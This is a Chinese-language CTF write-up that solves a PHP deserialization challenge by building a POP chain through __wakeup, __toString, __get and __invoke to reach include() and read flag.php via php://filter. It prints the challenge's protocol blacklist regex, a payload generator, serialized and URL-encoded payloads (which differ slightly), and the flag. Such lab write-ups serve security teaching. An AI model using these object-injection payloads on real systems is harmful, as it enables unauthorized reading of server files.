打开环境,得到源码:
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
以前理解的序列化攻击也就是简单的序列化攻击更多的是在魔术方法中出现一些利用的漏洞,因为魔术方法的自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名,观察联系类与函数之间的关系,将类的属性和敏感函数的属性联系起来,将其与魔术方法的利用结合起来,这时候就可以利用pop链的构造与攻击。
如果不了解什么是魔术方法就看看这篇文章:php魔术方法_yuananhh的博客-CSDN博客
首先了解一下本题需要知道的魔术方法:
__construct 当一个对象创建时被调用,
__toString 当一个对象被当作一个字符串被调用。
__wakeup() 使用unserialize时触发
__get() 用于从不可访问的属性读取数据
#难以访问包括:(1)私有属性,(2)没有初始化的属性
__invoke() 当脚本尝试将对象调用为函数时触发
然后来看代码,首先看Modifier类:
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
我们看到这里有个include()函数,在开始有提示flag在flag.php,所以我们应该想办法将flag.php包含,并想办法读取其中中的内容。
这里有个魔术方法__invoke(),这个方法是在对象本身被当作函数调用时就能自动调用此方法。
再看Test类:
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
此处如果_get()魔术方法
中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,就满足了_invoke()
方法的调用条件,所以会调用Modifier类中的_invoke()
方法。
那么_get()魔术方法又如何调用呢?
我们知道__get()方法用于从不可访问的属性读取数据,其中就包括两类:(1)私有属性:也就是关键字为’private,protected’的属性(2)没有初始化的属性:也就是未定义的属性。
接着看show类:
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
看到有个__construct()魔术方法,创建新对象的时候会自动调用这个方法,此处还有个__toString()魔术方法,他返回$this->str->source,假如我们让str等于Test类对象,但是由于Test中没有source,那么此时就会触发__get()方法。
接着就是如何调用
__toString()魔术方法。
我们又看到这里还有__wakeup()魔术方法,其中用到了函数preg_match(),将$this->source
做字符串比较匹配,那如果我们让$this->source等于
Show类,就调用了__toString()
方法。
__wakeup()魔术方法是在执行反序列化时就能调用,正好下面pop传值地方有反序列化:
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
这样一来pop链就形成:反序列化会调用__wakeup()魔术方法,__wakeup()魔术方法中的preg_match()函数参数$this->source等于
Show类,就调用__toString()魔术方法,__toString()魔术方法中让str等于Test类对象,Test中没有source属性就调用_get()魔术方法,_get()魔术方法
中让p等与Modifier类,以函数形式返回,就调用__invoke()魔术方法,就能完成包含。
最后来构造payload:
文件包含就能用php协议,base64编码读取源码,虽然过滤了一些协议但没过滤filter。
<?php
class Modifier{
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}//读取flag.php源码。
class Show{
public $source;
public $str;
public function __construct()
{
$this->str=new Test();//str等于Test类对象,但是由于Test中没有source,那么此时就会触发__get()方法。
}
}
class Test{
public $p;
public function __get($key){
$function = $this->p;
return $function();
}
}
$hack=new Show();//实例化show类
$hack->source=new Show();//让source等于Show类,就调用了__toString()方法。
$hack->source->str->p=new Modifier();//p赋值为Modifier类,那么相当于Modifier类被当作函数处理,调用Modifier类中的_invoke()方法。
echo serialize($hack);
?>
序列化后等于:
O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"*var";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}s:3:"str";O:4:"Test":1:{s:1:"p";N;}}
直接赋值还不行,还要将其url编码:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A3%3A%22aaa%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
得到源码base64加密,解密得到flag:
<?php
class Flag{
private $flag= "flag{cdddec3c-2132-4cf8-ba6f-6c6c3200f9c9}";
}
echo "Help Me Find FLAG!";
?>